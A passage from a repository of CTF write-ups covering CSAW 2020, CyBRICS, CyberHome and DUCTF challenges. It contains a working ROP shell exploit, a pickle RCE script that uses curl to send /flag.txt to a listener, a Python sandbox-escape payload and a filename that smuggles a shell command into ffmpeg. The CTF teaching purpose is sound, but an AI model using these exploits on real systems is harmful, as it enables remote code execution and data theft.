hex(FUNC_GOT)) 61 | 62 | rop_chain = [ 63 | POP_RDI, FUNC_GOT, 64 | PUTS_PLT, 65 | MAIN_PLT, 66 | ] 67 | 68 | rop_chain = b''.join([p64(i) for i in rop_chain]) 69 | payload = OFFSET + rop_chain 70 | 71 | print(p.clean()) 72 | print(payload) 73 | 74 | p.sendline(payload) 75 | 76 | received = p.recvline().strip() 77 | leak = u64(received.ljust(8, b'\x00')) 78 | libc.address = leak - libc.symbols[func_name] 79 | return hex(leak) 80 | 81 | 82 | log.info('Leaked address: ' + get_addr('__libc_start_main')) 83 | log.info('Libc base: ' + hex(libc.address)) 84 | 85 | 86 | BIN_SH = next(libc.search(b'/bin/sh\x00')) 87 | SYSTEM = 
libc.symbols['system'] 88 | EXIT = libc.symbols['exit'] 89 | 90 | 91 | log.info('/bin/sh: ' + hex(BIN_SH)) 92 | log.info('system: ' + hex(SYSTEM)) 93 | log.info('exit: ' + hex(EXIT)) 94 | 95 | 96 | ROP_CHAIN = [ 97 | RET, 98 | POP_RDI, BIN_SH, 99 | SYSTEM, 100 | EXIT, 101 | ] 102 | 103 | ROP_CHAIN = b''.join([p64(i) for i in ROP_CHAIN]) 104 | 105 | payload = OFFSET + ROP_CHAIN 106 | 107 | print(p.clean()) 108 | print(payload) 109 | 110 | p.sendline(payload) 111 | 112 | p.interactive() 113 | ``` 114 | 115 | First, you leak the address of the `__libc_start_main` function (or `puts` for that matter). Using that address, you calculate the base address of on the server. With the help of this libc address, you can find `/bin/sh`, `system` and `exit` and place them strategically on the stack to execute a ROP chain. 116 |
117 | 118 | After the script runs, it gives you a shell on the server. Use `cat flag.txt` to view the flag. 119 | 120 | The flag is: 121 | 122 | ``` 123 | flag{r0p_4ft3r_r0p_4ft3R_r0p} 124 | ``` 125 | -------------------------------------------------------------------------------- /CSAW Quals 2020/Pwn/roppity/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/CSAW Quals 2020/Pwn/roppity/libc-2.27.so -------------------------------------------------------------------------------- /CSAW Quals 2020/Pwn/roppity/rop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/CSAW Quals 2020/Pwn/roppity/rop -------------------------------------------------------------------------------- /CSAW Quals 2020/Pwn/roppity/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = ELF('./rop') 4 | rop = ROP(elf) 5 | 6 | local = False 7 | 8 | host = 'pwn.chal.csaw.io' 9 | port = 5016 10 | 11 | if local: 12 | p = elf.process() 13 | libc = ELF('/usr/lib/libc.so.6') 14 | else: 15 | p = remote(host, port) 16 | libc = ELF('./libc-2.27.so') 17 | 18 | 19 | PUTS_PLT = elf.plt['puts'] 20 | MAIN_PLT = elf.symbols['main'] 21 | 22 | # Same as ROPgadget --binary ./rop | grep "pop rdi" 23 | POP_RDI = rop.find_gadget(['pop rdi', 'ret'])[0] 24 | RET = rop.find_gadget(['ret'])[0] 25 | 26 | OFFSET = b'A' * (0x20 + 0x8) 27 | 28 | 29 | log.info("puts@plt: " + hex(PUTS_PLT)) 30 | log.info('main@plt: ' + hex(MAIN_PLT)) 31 | log.info("pop rdi; ret; gadget: " + hex(POP_RDI)) 32 | 33 | 34 | def get_addr(func_name): 35 | FUNC_GOT = elf.got[func_name] 36 | log.info(func_name + ' GOT @ ' + hex(FUNC_GOT)) 37 | 38 | rop_chain = [ 39 | POP_RDI, FUNC_GOT, 40 | PUTS_PLT, 41 | MAIN_PLT, 42 | 
] 43 | 44 | rop_chain = b''.join([p64(i) for i in rop_chain]) 45 | payload = OFFSET + rop_chain 46 | 47 | print(p.clean()) 48 | print(payload) 49 | 50 | p.sendline(payload) 51 | 52 | received = p.recvline().strip() 53 | leak = u64(received.ljust(8, b'\x00')) 54 | libc.address = leak - libc.symbols[func_name] 55 | return hex(leak) 56 | 57 | 58 | log.info('Leaked address: ' + get_addr('__libc_start_main')) 59 | log.info('Libc base: ' + hex(libc.address)) 60 | 61 | 62 | BIN_SH = next(libc.search(b'/bin/sh\x00')) 63 | SYSTEM = libc.symbols['system'] 64 | EXIT = libc.symbols['exit'] 65 | 66 | 67 | log.info('/bin/sh: ' + hex(BIN_SH)) 68 | log.info('system: ' + hex(SYSTEM)) 69 | log.info('exit: ' + hex(EXIT)) 70 | 71 | 72 | ROP_CHAIN = [ 73 | RET, 74 | POP_RDI, BIN_SH, 75 | SYSTEM, 76 | EXIT, 77 | ] 78 | 79 | ROP_CHAIN = b''.join([p64(i) for i in ROP_CHAIN]) 80 | 81 | payload = OFFSET + ROP_CHAIN 82 | 83 | print(p.clean()) 84 | print(payload) 85 | 86 | p.sendline(payload) 87 | 88 | p.interactive() 89 | -------------------------------------------------------------------------------- /CSAW Quals 2020/Pwn/slithery/blacklist.py: -------------------------------------------------------------------------------- 1 | BLACKLIST = [ 2 | '__builtins__', 3 | '__import__', 4 | 'open', 5 | 'exec', 6 | 'dir', 7 | 'type', 8 | 'read', 9 | 'fromhex', 10 | ] 11 | -------------------------------------------------------------------------------- /CSAW Quals 2020/Pwn/slithery/sandbox.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from base64 import b64decode 3 | import blacklist # you don't get to see this :p 4 | 5 | """ 6 | Don't worry, if you break out of this one, we have another one underneath so that you won't 7 | wreak any havoc! 
8 | """ 9 | 10 | def main(): 11 | print("EduPy 3.8.2") 12 | while True: 13 | try: 14 | command = input(">>> ") 15 | if any([x in command for x in blacklist.BLACKLIST]): 16 | raise Exception("not allowed!!") 17 | 18 | final_cmd = """ 19 | uOaoBPLLRN = open("sandbox.py", "r") 20 | uDwjTIgNRU = int(((54 * 8) / 16) * (1/3) - 8) 21 | ORppRjAVZL = uOaoBPLLRN.readlines()[uDwjTIgNRU].strip().split(" ") 22 | AAnBLJqtRv = ORppRjAVZL[uDwjTIgNRU] 23 | bAfGdqzzpg = ORppRjAVZL[-uDwjTIgNRU] 24 | uOaoBPLLRN.close() 25 | HrjYMvtxwA = getattr(__import__(AAnBLJqtRv), bAfGdqzzpg) 26 | RMbPOQHCzt = __builtins__.__dict__[HrjYMvtxwA(b'X19pbXBvcnRfXw==').decode('utf-8')](HrjYMvtxwA(b'bnVtcHk=').decode('utf-8'))\n""" + command 27 | exec(final_cmd) 28 | 29 | except (KeyboardInterrupt, EOFError): 30 | return 0 31 | except Exception as e: 32 | print(f"Exception: {e}") 33 | 34 | if __name__ == "__main__": 35 | exit(main()) 36 | 37 | """ 38 | obj=lambda: None; setattr(obj, 'read', lambda x: base64.b64decode('gANjcG9z 39 | aXgKc3lzdGVtCnEAWAIAAABsc3EBhXECUnEDLg==')); setattr(obj, 'seek', lambda x,y:x) 40 | ; setattr(obj, 'readline', lambda x: base64.b64decode('gANjcG9zaXgKc3lzdGVtCnEAWAIAAABsc3EBhXECUnEDLg==')); 41 | 42 | 43 | 44 | # obj=lambda: None; setattr(obj, HrjYMvtxwA('cmVhZAo=').decode(), lambda: 'hello') 45 | 46 | """ 47 | -------------------------------------------------------------------------------- /CSAW Quals 2020/README.md: -------------------------------------------------------------------------------- 1 | # CSAW CTF Quals 2020 2 | 3 | - Official URL: http://ctf.csaw.io/ 4 | - Format: Jeopardy 5 | - Duration: Sat, 12 Sept. 2020, 01:30 IST — Mon, 14 Sept. 
2020, 01:30 IST 6 | -------------------------------------------------------------------------------- /CSAW Quals 2020/Rev/baby_mult/program.txt: -------------------------------------------------------------------------------- 1 | 85, 72, 137, 229, 72, 131, 236, 24, 72, 199, 69, 248, 79, 0, 0, 0, 72, 184, 21, 79, 231, 75, 1, 0, 0, 0, 72, 137, 69, 240, 72, 199, 69, 232, 4, 0, 0, 0, 72, 199, 69, 224, 3, 0, 0, 0, 72, 199, 69, 216, 19, 0, 0, 0, 72, 199, 69, 208, 21, 1, 0, 0, 72, 184, 97, 91, 100, 75, 207, 119, 0, 0, 72, 137, 69, 200, 72, 199, 69, 192, 2, 0, 0, 0, 72, 199, 69, 184, 17, 0, 0, 0, 72, 199, 69, 176, 193, 33, 0, 0, 72, 199, 69, 168, 233, 101, 34, 24, 72, 199, 69, 160, 51, 8, 0, 0, 72, 199, 69, 152, 171, 10, 0, 0, 72, 199, 69, 144, 173, 170, 141, 0, 72, 139, 69, 248, 72, 15, 175, 69, 240, 72, 137, 69, 136, 72, 139, 69, 232, 72, 15, 175, 69, 224, 72, 15, 175, 69, 216, 72, 15, 175, 69, 208, 72, 15, 175, 69, 200, 72, 137, 69, 128, 72, 139, 69, 192, 72, 15, 175, 69, 184, 72, 15, 175, 69, 176, 72, 15, 175, 69, 168, 72, 137, 133, 120, 255, 255, 255, 72, 139, 69, 160, 72, 15, 175, 69, 152, 72, 15, 175, 69, 144, 72, 137, 133, 112, 255, 255, 255, 184, 0, 0, 0, 0, 201 2 | -------------------------------------------------------------------------------- /CSAW Quals 2020/Rev/not_malware/README.md: -------------------------------------------------------------------------------- 1 | # not_malware 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Ghidra 8 | 9 | # Source 10 | 11 | - [not_malware](./not_malware) 12 | 13 | ``` 14 | To be perfectly frank, I do some malware-y things, but that doesn't mean that I'm actually malware, I promise! 15 | 16 | nc rev.chal.csaw.io 5008 17 | ``` 18 | 19 | # Exploitation 20 | 21 | When you read the code after decompilation using Ghidra, you see it roughly consists of the following steps: 22 | 23 | 1. Prevent the use of a debugger. 24 | 2. 
Asks the user "What\'s your credit card number (for safekeeping) ?" and takes an input. 25 | 26 | ``` 27 | printf("What\'s your credit card number (for safekeeping) ?\n>> ") 28 | ``` 29 | 30 | 3. Reads a string located 27 bytes above `yeetbank`, and checks if the first 8 bytes of the input is the same as that string. 31 | 32 | ``` 33 | iVar1 = strncmp(local_28,"yeetbank" + (long)local_18 * 9,8); 34 | ``` 35 | 36 | This string is `softbank`. 37 | 38 | 4. Checks whether the next byte of the input string is `:`. 39 | 40 | 5. Sets 3 local variables. The first one is assigned as the seed using `srand()` of a random number generating function. The other is used to as an index to read a number from this random number. We can pass these as `000`, so that it becomes `srand(0)` and then `rand()` with the constant seed `0` always returns `1804289383`. Therefore, the first index will always be `1`. 41 | 42 | 6. The next 20 if statements check whether the next 20 bytes of input are the first character of the random number generated, in our case `1`. 43 | 44 | 7. Lastly, it checks if the string ends with a `:` followed by `end`. 45 | 46 | Finally, our exploit string is: 47 | 48 | ``` 49 | softbank:000:11111111111111111111:end 50 | ``` 51 | 52 | Connect to the netcat link and enter this string. 53 | 54 | ``` 55 | What's your credit card number (for safekeeping) ? 56 | >> softbank:000:11111111111111111111:end 57 | Thanks! 
58 | flag{th4x_f0r_ur_cr3d1t_c4rd} 59 | ``` 60 | 61 | The flag is: 62 | 63 | ``` 64 | flag{th4x_f0r_ur_cr3d1t_c4rd} 65 | ``` 66 | -------------------------------------------------------------------------------- /CSAW Quals 2020/Rev/not_malware/not_malware: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/CSAW Quals 2020/Rev/not_malware/not_malware -------------------------------------------------------------------------------- /CSAW Quals 2020/Web/flask_caching/README.md: -------------------------------------------------------------------------------- 1 | # flask_caching 2 | 3 | Author: [roerohan](https://github.com/roerohan) and [thebongy](https://github.com/thebongy) 4 | 5 | # Requirements 6 | 7 | - Python 8 | 9 | # Source 10 | 11 | - [app.py](./app.py) 12 | 13 | ``` 14 | cache all the things (this is python3) 15 | 16 | http://web.chal.csaw.io:5000 17 | ``` 18 | 19 | # Exploitation 20 | 21 | ```py 22 | # app.py 23 | 24 | from flask_caching import Cache 25 | ``` 26 | 27 | When you look at the documentation for the source for the `flask_caching` module, you can optionally store a python pickle in the redis by prepending it with `'!'`. You can use python pickles for RCE, when the caching modules uses `pickle.load()` to load the cached data. 28 | 29 | Set up a netcat listener on your server and run the following script with your IP and PORT. 
30 | 31 | ```py 32 | import pickle 33 | import sys 34 | import base64 35 | import requests 36 | import time 37 | 38 | IP = '0.0.0.0' # Your IP here 39 | PORT = 8000 40 | DEFAULT_COMMAND=f'curl -d "$(cat /flag.txt)" {IP}:{PORT}' 41 | COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND 42 | 43 | class PickleRce(object): 44 | def __reduce__(self): 45 | import os 46 | return (os.system,(COMMAND,)) 47 | 48 | f = open('payload', 'wb') 49 | f.write(b'!'+pickle.dumps(PickleRce())) 50 | f.close() 51 | 52 | time.sleep(0.5) 53 | 54 | data = open('payload', 'rb').read() 55 | print(data) 56 | url = 'http://web.chal.csaw.io:5000/' 57 | 58 | test = 'test23' 59 | 60 | requests.post(url, files={ 'content': ('content', open('payload', 'rb').read()) }, data={ 'title': f'flask_cache_view//{test}' }) 61 | 62 | r = requests.get(url + test) 63 | print(r.text) 64 | ``` 65 | 66 | On your netcat listener, you would get: 67 | 68 | ``` 69 | POST / HTTP/1.1 70 | Host: yourhost:yourport 71 | User-Agent: curl/7.69.1 72 | Accept: */* 73 | Content-Length: 16 74 | Content-Type: application/x-www-form-urlencoded 75 | 76 | flag{f1@sK_10rD} 77 | ``` 78 | 79 | The flag is: 80 | 81 | ``` 82 | flag{f1@sK_10rD} 83 | ``` -------------------------------------------------------------------------------- /CSAW Quals 2020/Web/flask_caching/solve.py: -------------------------------------------------------------------------------- 1 | import pickle 2 | import sys 3 | import base64 4 | import requests 5 | import time 6 | 7 | IP = '0.0.0.0' # Your IP here 8 | PORT = 8000 9 | DEFAULT_COMMAND=f'curl -d "$(cat /flag.txt)" {IP}:{PORT}' 10 | COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND 11 | 12 | class PickleRce(object): 13 | def __reduce__(self): 14 | import os 15 | return (os.system,(COMMAND,)) 16 | 17 | f = open('payload', 'wb') 18 | f.write(b'!'+pickle.dumps(PickleRce())) 19 | f.close() 20 | 21 | time.sleep(0.5) 22 | 23 | data = open('payload', 'rb').read() 24 | print(data) 25 | url = 
'http://web.chal.csaw.io:5000/' 26 | 27 | test = 'test23' 28 | 29 | requests.post(url, files={ 'content': ('content', open('payload', 'rb').read()) }, data={ 'title': f'flask_cache_view//{test}' }) 30 | 31 | r = requests.get(url + test) 32 | print(r.text) -------------------------------------------------------------------------------- /CyBRICS CTF/CTB/DockEsc/README.md: -------------------------------------------------------------------------------- 1 | # DockEsc 2 | 3 | Author: [roerohan](https://github.com/roerohan) and [thebongy](https://github.com/thebongy) 4 | 5 | # Requirements 6 | 7 | - Docker 8 | 9 | # Source 10 | 11 | ``` 12 | Hey, check it out: i've just shoulder-surfed CyBRICS organizers and got the command they run to deploy new service on every connection! 13 | 14 | Looks like they are planning to give you the flag if you Escape the Docker! 15 | 16 | Alas, my camera broke the JPEG at the very sweet spot. I wonder if we can somehow get that --detach-keys value 17 | 18 | ssh dockesc@109.233.57.94 19 | Password: B9Go9eGS 20 | ``` 21 | 22 | # Exploitation 23 | 24 | When you connect to the server using `ssh`, you land in a docker container executing `sleep infinity`. The image provided in the challenge shows a part of the `--detach-keys` which is `ctrl-p,p,i,c,t,u`. Now when you start typing something on the container, you notice that it doesnt show anything on your terminal if you keep writing the correct thing. As soon as it's incorrect, it displays it. So, our plan was to try all combinations using a script, but we figured we could try manually for a bit, and we got lucky and got third blood `:)`. 25 | 26 | When you type `ctrl-ppictureisworthathousandwords`, it escapes the container and you get the flag. 
27 | 28 | The flag is: 29 | 30 | ``` 31 | cybrics{y0u_h4V3_k1LL3D_the_INFINITY} 32 | ``` 33 | -------------------------------------------------------------------------------- /CyBRICS CTF/Cyber/Serial/README.md: -------------------------------------------------------------------------------- 1 | # Serial 2 | 3 | Author: [roerohan](https://github.com/roerohan) and [thebongy](https://github.com/thebongy) 4 | 5 | # Requirements 6 | 7 | - Node.js 8 | 9 | # Source 10 | 11 | ```javascript 12 | var http = require('http'); 13 | var url = require('url'); 14 | var parse = require('querystring'); 15 | var fs = require('fs'); 16 | var index = fs.readFileSync('index.html'); 17 | var flag = fs.readFileSync('flag.html'); 18 | var err = fs.readFileSync('error.html'); 19 | 20 | http.createServer(function (req, res) { 21 | var q = url.parse(req.url, true) 22 | if (q.path == "/"){ 23 | res.writeHead(200,{"Content-Type": "text/html"}); 24 | res.write(index); //write a response to the client 25 | res.end(); //end the response 26 | } 27 | else if (q.path == "/enter"){ 28 | if (req.method === 'POST') { 29 | var body = ''; 30 | req.on('data', chunk=> {body += chunk.toString()}); 31 | req.on('end', () => { 32 | console.log(body); 33 | body = parse.parse(body); 34 | console.log(body); 35 | var a=parseInt(body.serial1),b=parseInt(body.serial2),c=parseInt(body.serial3); 36 | console.log("Serial:",a,b,c) 37 | if ( (a>0 && a < 1000000) & (b>0 && b < 1000000) & (c>0 && c < 1000000) & a*a*a + b*b*b == c*c*c){ 38 | res.writeHead(200,{"Content-Type": "text/html"}); 39 | res.write(flag); 40 | res.end(); 41 | } 42 | else{ 43 | res.writeHead(200,{"Content-Type": "text/html"}); 44 | res.write(err); 45 | res.end(); 46 | } 47 | } 48 | ) 49 | }; 50 | } 51 | else{ 52 | res.writeHead(404,{"Content-Type": "text/html"}); 53 | res.write("

404 Not found

"); 54 | res.end(); 55 | } 56 | } 57 | ).listen(8081); 58 | ``` 59 | 60 | # Exploitation 61 | 62 | The interesting part in this program is this line: 63 | 64 | ```javascript 65 | if ((a>0 && a < 1000000) & (b>0 && b < 1000000) & (c>0 && c < 1000000) & a*a*a + b*b*b == c*c*c) {...} 66 | ``` 67 | 68 | Since the `==` operator has higher precedence than `&`, `a*a*a + b*b*b == c*c*c` will be evaluated first. This part of the expression will undergo bitwise `&` with the other parts. Now, `a^n + b^n == c^n` for all `n > 2` is mathematically impossible, as stated by Fermat's theorem, so it would seem impossible to solve this challenge. But, if you notice, `999999 ^ 3` is way past the range JS can accomodate. If you try `999999^3 + 1 == 999999^3`, you will get true in JS! Now you know what to do. 69 | 70 | ``` 71 | > 999999*999999*999999 + 1 == 999999*999999*999999 72 | true 73 | ``` 74 | 75 | Pass `serial1 = 9999999, serial2 = 1 and serial 3 = 999999`. You successfully get the flag. 76 | 77 | The flag is: 78 | 79 | ``` 80 | cybrics{CYB3R_M47H_15_57R4Ng3} 81 | ``` 82 | -------------------------------------------------------------------------------- /CyBRICS CTF/README.md: -------------------------------------------------------------------------------- 1 | # CyBRICS CTF 2 | 3 | - Official URL: https://cybrics.net/ 4 | - Format: Jeopardy 5 | - Duration: Sat, 25 July 2020, 15:30 IST — Sun, 26 July 2020, 15:30 IST -------------------------------------------------------------------------------- /CyBRICS CTF/Web/Gif2png/csictf.gif' -vf drawtext=\"text=$(grep ffLaG main.py)\"'.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/CyBRICS CTF/Web/Gif2png/csictf.gif' -vf drawtext=\"text=$(grep ffLaG main.py)\"'.gif -------------------------------------------------------------------------------- /CyBRICS CTF/Web/Hunt/README.md: 
-------------------------------------------------------------------------------- 1 | # Hunt 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Browser Devtools 8 | 9 | # Source 10 | 11 | - http://109.233.57.94:54040/ 12 | 13 | # Exploitation 14 | 15 | In this challenge, you see a bunch of captcha's floating around on your screen, and the goal is to successfully get 5 captchas. There's many ways to solve this, here's what I did: 16 |
17 | 18 | When you see the source, this is the function which creates the captchas and makes them move: 19 | 20 | ```javascript 21 | function addCaptcha() { 22 | const captchaBox = document.createElement('div'); 23 | const widgetId = grecaptcha.render(captchaBox, { 24 | 'sitekey' : '6Ld0sCEUAAAAAKu8flcnUdVb67kCEI_HYKSwXGHN', 25 | 'theme' : 'light', 26 | 'callback': 'good', 27 | }); 28 | 29 | captchaBox.className = 'captcha'; 30 | document.body.appendChild(captchaBox); 31 | 32 | count ++; 33 | updateStatus(); 34 | 35 | let dividerA = (Math.random() * 250) + 250; 36 | let dividerB = (Math.random() * 250) + 250; 37 | let dividerC = (Math.random() * 25) + 25; 38 | 39 | function loop() { 40 | const height = window.innerHeight - captchaBox.offsetHeight; 41 | captchaBox.style.top = Math.sin(Date.now()/dividerA) * (height/2) + (height/2); 42 | 43 | const width = window.innerWidth - captchaBox.offsetWidth; 44 | captchaBox.style.left = Math.sin(Date.now()/dividerB) * (width/2) + (width/2); 45 | 46 | captchaBox.style.transform = `rotate(${Math.sin(Date.now()/dividerC) * 10}deg)`; 47 | 48 | setTimeout(loop, 1); 49 | } 50 | loop(); 51 | } 52 | ``` 53 | 54 | Just modify this function using your devtools, remove the part where it runs loop. 55 | 56 | ```js 57 | function addCaptcha() { 58 | const captchaBox = document.createElement('div'); 59 | const widgetId = grecaptcha.render(captchaBox, { 60 | 'sitekey' : '6Ld0sCEUAAAAAKu8flcnUdVb67kCEI_HYKSwXGHN', 61 | 'theme' : 'light', 62 | 'callback': 'good', 63 | }); 64 | 65 | captchaBox.className = 'captcha'; 66 | document.body.appendChild(captchaBox); 67 | 68 | count ++; 69 | updateStatus(); 70 | } 71 | ``` 72 | 73 | Now, you can manually add 5 captchas and get them. Just call the function `addCaptcha()` and keep clicking the boxes. When you're done with 5, click on `GET FLAG`, and copy the flag from the screen! 
74 | 75 | The flag is: 76 | 77 | ``` 78 | cybrics{Th0se_c4p7ch4s_c4n_hunter2_my_hunter2ing_hunter2} 79 | ``` 80 | -------------------------------------------------------------------------------- /CyberHome CTF/Cryptography/Artemis/Artemis: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/CyberHome CTF/Cryptography/Artemis/Artemis -------------------------------------------------------------------------------- /CyberHome CTF/Cryptography/Artemis/README.md: -------------------------------------------------------------------------------- 1 | # Artemis 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | This is another `file` challenge. 6 | 7 | # Requirements 8 | 9 | - Linux `file` command. 10 | - HTML 11 | 12 | # Source 13 | 14 | - [Artemis](./Artemis) 15 | 16 | # Exploitation 17 | 18 | When you run `file` on the `Artemis` file, you see it's a `rar` file. 19 | 20 | ``` 21 | $ file Artemis 22 | Artemis: RAR archive data, v5 23 | ``` 24 | 25 | Now, when you extract this compressed file, you get a folder `artemis_fichiers` and a file [`artemis.htm`](./artemis.htm). When you analyze that file, you may find: 26 | 27 | ```html 28 | valign="center">cbrhspacethspaceartmis>> UserWrote = [None]*53 55 | >>> UserWrote[13:19] = "n6_c4n" 56 | >>> UserWrote[0:4] = "cbrh" 57 | >>> UserWrote[19:25] = "_b3_qu" 58 | >>> UserWrote[4:8] = "{r3v" 59 | >>> UserWrote[25:31] = "173_c0" 60 | >>> UserWrote[8:13] = "3r533" 61 | >>> UserWrote[31:36] = "0l_bu" 62 | >>> UserWrote[40:46] = "7_w17h" 63 | >>> UserWrote[50:54] = "h0n}" 64 | >>> UserWrote[46:50] = "_py7" 65 | >>> UserWrote[36:40] = "7_n0" 66 | >>> print(''.join(UserWrote)) 67 | cbrh{r3v3r533n6_c4n_b3_qu173_c00l_bu7_n07_w17h_py7h0n} 68 | ``` 69 | 70 | That gives you the flag. 
The flag is: 71 | 72 | ``` 73 | cbrh{r3v3r533n6_c4n_b3_qu173_c00l_bu7_n07_w17h_py7h0n} 74 | ``` -------------------------------------------------------------------------------- /CyberHome CTF/Reverse Engineering/lemon_zest/lemon_zest.py: -------------------------------------------------------------------------------- 1 | def CheckingPasswd(): 2 | UserWrote = input("Enter your *PASSWD*: ") 3 | if UserWrote[13:19] == "n6_c4n": 4 | if UserWrote[0:4] == "cbrh": 5 | if UserWrote[19:25] == "_b3_qu": 6 | if UserWrote[4:8] == "{r3v": 7 | if UserWrote[25:31] == "173_c0": 8 | if UserWrote[8:13] == "3r533": 9 | if UserWrote[31:36] == "0l_bu": 10 | if UserWrote[40:46] == "7_w17h": 11 | if UserWrote[50:54] == "h0n}": 12 | if UserWrote[46:50] == "_py7": 13 | if UserWrote[36:40] == "7_n0": 14 | return True 15 | else: 16 | return False 17 | 18 | 19 | 20 | def main(): 21 | auth = CheckingPasswd() 22 | if auth == True: 23 | print("so... The flag can be the password.") 24 | print("You deserve it!Gj") 25 | else: 26 | print("Incorrect password!") 27 | print("F.O.C.U.S S.T.U.P.I.D H.U.M.A.N") 28 | AnotherMain() 29 | 30 | 31 | 32 | def AnotherMain(): 33 | auth = AnotherCheckingPasswd() 34 | if auth == True: 35 | print("The flag can be the password.") 36 | print("You deserve it!Gj") 37 | exit() 38 | else: 39 | print("Incorrect password!") 40 | print("NEXT ONE WILL BE THE GOOD ONE") 41 | AnotherMain() 42 | 43 | 44 | def AnotherCheckingPasswd(): 45 | UserWrote = input("Enter your *PASSWD*: ") 46 | if UserWrote[13:19] == "n6_c4n": 47 | if UserWrote[0:4] == "cbrh": 48 | if UserWrote[19:25] == "_b3_qu": 49 | if UserWrote[4:8] == "{r3v": 50 | if UserWrote[25:31] == "173_c0": 51 | if UserWrote[8:13] == "3r533": 52 | if UserWrote[31:36] == "0l_bu": 53 | if UserWrote[40:46] == "7_w17h": 54 | if UserWrote[50:54] == "h0n}": 55 | if UserWrote[46:50] == "_py7": 56 | if UserWrote[36:40] == "7_n0": 57 | return True 58 | else: 59 | return False 60 | 61 | auth = False 62 | main() 63 | 
-------------------------------------------------------------------------------- /CyberHome CTF/Steganography/54V3_7H3_W0R1D/flag.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/CyberHome CTF/Steganography/54V3_7H3_W0R1D/flag.ico -------------------------------------------------------------------------------- /DUCTF/README.md: -------------------------------------------------------------------------------- 1 | # DUCTF 2 | 3 | - Official URL: http://downunderctf.com/ 4 | - Format: Jeopardy 5 | - Duration: Fri, 18 Sept. 2020, 14:30 IST — Sun, 20 Sept. 2020, 14:30 IST -------------------------------------------------------------------------------- /DUCTF/crypto/babyrsa/README.md: -------------------------------------------------------------------------------- 1 | # babyrsa 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Source 6 | 7 | ``` 8 | This is just RSA for babies! 9 | ``` 10 | 11 | ## Exploit 12 | 13 | The factors can be recovered from factordb. 
14 | 15 | ```py 16 | import math 17 | from Crypto.Util.number import inverse 18 | 19 | e = 0x10001 20 | 21 | n = 19574201286059123715221634877085223155972629451020572575626246458715199192950082143183900970133840359007922584516900405154928253156404028820410452946729670930374022025730036806358075325420793866358986719444785030579682635785758091517397518826225327945861556948820837789390500920096562699893770094581497500786817915616026940285194220703907757879335069896978124429681515117633335502362832425521219599726902327020044791308869970455616185847823063474157292399830070541968662959133724209945293515201291844650765335146840662879479678554559446535460674863857818111377905454946004143554616401168150446865964806314366426743287 22 | s = 3737620488571314497417090205346622993399153545806108327860889306394326129600175543006901543011761797780057015381834670602598536525041405700999041351402341132165944655025231947620944792759658373970849932332556577226700342906965939940429619291540238435218958655907376220308160747457826709661045146370045811481759205791264522144828795638865497066922857401596416747229446467493237762035398880278951440472613839314827303657990772981353235597563642315346949041540358444800649606802434227470946957679458305736479634459353072326033223392515898946323827442647800803732869832414039987483103532294736136051838693397106408367097 23 | c = 7000985606009752754441861235720582603834733127613290649448336518379922443691108836896703766316713029530466877153379023499681743990770084864966350162010821232666205770785101148479008355351759336287346355856788865821108805833681682634789677829987433936120195058542722765744907964994170091794684838166789470509159170062184723590372521926736663314174035152108646055156814533872908850156061945944033275433799625360972646646526892622394837096683592886825828549172814967424419459087181683325453243145295797505798955661717556202215878246001989162198550055315405304235478244266317677075034414773911739900576226293775140327580 24 | 25 | # From 
factordb 26 | 27 | p = 137526660281921131221818797107719332505145627503966517923070280130875449016216283557144366594925577458093232503891037595787957060953687166721367679274343931891139309595758625134752102980837611457006046816552168551932124923087090435785959383128842381406539452056309367997750395905747259198693037451326868517899 28 | 29 | q = 142330230705328145595283676471239195558844969347785580004001554538877181973869318257471293219512143354019499347549183531116588694914100319083003689276059546015147159203569933280678564050512749524779927522346194056170602443980796876645843108623490893506040488132906421994550401879219627124260709500352428249413 30 | 31 | 32 | 33 | print(p*q == n) 34 | 35 | phi = (p-1)*(q-1) 36 | 37 | d = inverse(e, phi) 38 | 39 | m = pow(c,d,n) 40 | 41 | m = hex(m)[2:] 42 | 43 | print(bytes.fromhex(m)) 44 | ``` 45 | 46 | The flag is: 47 | 48 | ``` 49 | DUCTF{e4sy_RSA_ch4ll_t0_g3t_st4rt3d} 50 | ``` -------------------------------------------------------------------------------- /DUCTF/crypto/babyrsa/solve.py: -------------------------------------------------------------------------------- 1 | import math 2 | from Crypto.Util.number import inverse 3 | 4 | e = 0x10001 5 | 6 | n = 19574201286059123715221634877085223155972629451020572575626246458715199192950082143183900970133840359007922584516900405154928253156404028820410452946729670930374022025730036806358075325420793866358986719444785030579682635785758091517397518826225327945861556948820837789390500920096562699893770094581497500786817915616026940285194220703907757879335069896978124429681515117633335502362832425521219599726902327020044791308869970455616185847823063474157292399830070541968662959133724209945293515201291844650765335146840662879479678554559446535460674863857818111377905454946004143554616401168150446865964806314366426743287 7 | s = 
